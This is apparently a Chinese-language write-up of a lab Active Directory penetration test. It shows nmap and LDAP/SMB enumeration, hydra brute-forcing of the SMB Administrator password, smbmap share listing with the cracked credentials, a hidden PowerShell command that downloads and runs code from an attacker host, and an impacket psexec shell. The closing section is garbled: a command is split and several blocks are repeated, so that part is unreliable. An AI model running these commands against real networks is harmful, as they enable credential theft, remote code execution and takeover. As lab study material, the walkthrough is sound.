实验域渗透(一)

实验域渗透(一)

域环境下载地址

1
2
3
4
5
nmap scan report for 192.168.28.10
Host is up (0.00027s latency).
MAC Address: 00:0C:29:85:19:D4 (VMware)
Nmap scan report for 192.168.28.20
Host is up (0.00043s latency).

信息搜集

失败的尝试(可以不用看这部分)

域成员机器——二零

nmap -sS 192.168.28.20

1
2
3
4
5
6
7
8
9
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:50:56:28:51:36 (VMware)

masscan -p1-65535,U:1-65535 192.168.28.20 –rate=1000 -p1-65535,U:1-65535 -e eth0

1
2
3
4
无法扫描
FAIL: failed to detect router for interface: "eth0"
 [hint] try something like "--router-mac 66-55-44-33-22-11" to specify router
 [hint] try something like "--interface eth0" to change interface

nmap -sV 192.168.28.20

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Nmap scan report for 192.168.28.20
Host is up (0.00062s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:50:56:28:51:36 (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

检查445端口

在这里有两个分支,广度搜索1-65535端口,看是否有漏掉的端口开放。深度搜索445端口,是否有未授权访问或者弱口令等漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
nmap --script safe -p445 192.168.28.20
Pre-scan script results:
| broadcast-igmp-discovery: 
|   192.168.28.1
|     Interface: eth0
|     Version: 2
|     Group: 224.0.0.251
|     Description: mDNS (rfc6762)
|   192.168.28.10
|     Interface: eth0
|     Version: 2
|     Group: 224.0.0.252
|     Description: Link-local Multicast Name Resolution (rfc4795)
|   192.168.28.1
|     Interface: eth0
|     Version: 2
|     Group: 239.192.0.0
|     Description: Organization-Local Scope (rfc2365)
|   192.168.28.1
|     Interface: eth0
|     Version: 2
|     Group: 239.255.255.250
|     Description: Organization-Local Scope (rfc2365)
|_  Use the newtargets script-arg to add the results as targets
| broadcast-listener: 
|   ether
|       ARP Request
|         sender ip      sender mac         target ip
|         192.168.28.10  00:0C:29:85:19:D4  192.168.28.2
|   udp
|       SSDP
|         ip            uri
|_        192.168.28.1   urn:dial-multiscreen-org:service:dial:1
|_broadcast-xdmcp-discover: ERROR
|_eap-info: please specify an interface with -e
| knx-gateway-discover: 
|_ ERROR: Couldn't get interface for 224.0.23.12
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for 192.168.28.20
Host is up (0.00080s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:50:56:28:51:36 (VMware)

Host script results:
| dns-blacklist: 
|   SPAM
|     bl.spamcop.net - FAIL
|     sbl.spamhaus.org - FAIL
|     spam.dnsbl.sorbs.net - FAIL
|     bl.nszones.com - FAIL
|     l2.apews.org - FAIL
|     dnsbl.inps.de - FAIL
|     all.spamrats.com - FAIL
|     list.quorum.to - FAIL
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|     http.dnsbl.sorbs.net - FAIL
|     socks.dnsbl.sorbs.net - FAIL
|     tor.dan.me.uk - FAIL
|     dnsbl.tornevall.org - FAIL
|   ATTACK
|_    all.bl.blocklist.de - FAIL
|_fcrdns: FAIL (No PTR record)
|_ipidseq: Unknown
|_msrpc-enum: No accounts left to try
|_nbstat: NetBIOS name: WIN-BBMAQT15JMD, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:28:51:36 (VMware)
|_path-mtu: PMTU == 1500
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: No accounts left to try
| smb-protocols: 
|   dialects: 
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|     2.10
|     3.00
|_    3.02
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-capabilities: 
|   2.02: 
|     Distributed File System
|   2.10: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.00: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.02: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-23 22:16:51
|_  start_date: 2020-07-21 22:56:07
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)

Post-scan script results:
| reverse-index: 
|_  445/tcp: 192.168.28.20

smbclient -L //192.168.28.20
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 

需要输入密码才能访问

全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49174/tcp open  unknown
49178/tcp open  unknown
49185/tcp open  unknown

5985

1
2
3
4
5
6
nmap -p 5985 -sV 192.168.28.20
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

http://192.168.28.20:5985
http://192.168.28.20:47001/

利用

失败的操作

1
2
3
4
Windows Server 2008 R2 - 2012
而且开放了445,这个exp先打一下试试看
use exploit/windows/smb/ms08_067_netapi
失败

53port

nmap -p53 192.168.28.10 -sV

1
2
3
4
5
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-23 22:43 +08
Nmap scan report for 192.168.28.10
Host is up (0.00036s latency).
PORT   STATE SERVICE VERSION
53/tcp open  domain?

nmap –script=discovery 192.168.28.10

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
域名 test.local

smbclient -L 192.168.28.10
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful
Domain=[TEST] OS=[Windows Server 2012 R2 Standard 9600] Server=[Windows Server 2012 R2 Standard 6.3]

	Sharename       Type      Comment
	---------       ----      -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Connection to 192.168.28.10 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
NetBIOS over TCP disabled -- no workgroup available

echo 192.168.28.10 test.local >> /etc/hosts

nmap -p 389 -script ldap-search test.local
389/tcp open  ldap

ldapsearch -h 192.168.28.10 -p 389 -x -b dc=test,dc=local 

成功的操作

1
2
3
4
5
6
7
8
9
hydra 192.168.28.20 smb -l Administrator -P /usr/share/wordlists/500-worst-passwords.txt -T 64 -V
enum4linux -a -o test.local > test.local.txt
---

Target ........... test.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

1

smbmap -u administrator -p abc123! -d workgroup -H 192.168.28.20

2

1
2
3
4
5
6
7
8
9
10
11
smbmap -u administrator -p abc123! -d workgroup  -H 192.168.28.20 -P 445 -R admin$ > smb-admin.txt

smbmap -u administrator -p abc123! -d workgroup  -H 192.168.28.20 -P 445 -R c$ > smb-c.txt

smbmap -u administrator -p abc123! -d workgroup  -H 192.168.28.20 -P 445 -R c/users$ > smb-c.txt

smbmap -u administrator -p abc123! -d workgroup  -H 192.168.28.20 -P 445 -R c$/users  > c-user.txt

smbmap -u administrator -p abc123! -d workgroup  -H 192.168.28.20 -P 445 -x 'powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(

拿到一个shell

python /usr/share/doc/python-impacket/examples/psexec.py workgroup/Administrator@192.168.28.20 cmd.exe

3

参考资料

Kali Linux信息收集之enum4linux

说说Powersploit在内网渗透中的使用

http://192.168.28.1:80/a

拿到一个shell

python /usr/share/doc/python-impacket/examples/psexec.py workgroup/Administrator@192.168.28.20 cmd.exe

3

参考资料

Kali Linux信息收集之enum4linux

说说Powersploit在内网渗透中的使用

))\"' > command-smb.txt powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.1:80/a'))"

拿到一个shell

python /usr/share/doc/python-impacket/examples/psexec.py workgroup/Administrator@192.168.28.20 cmd.exe

3

参考资料

Kali Linux信息收集之enum4linux

说说Powersploit在内网渗透中的使用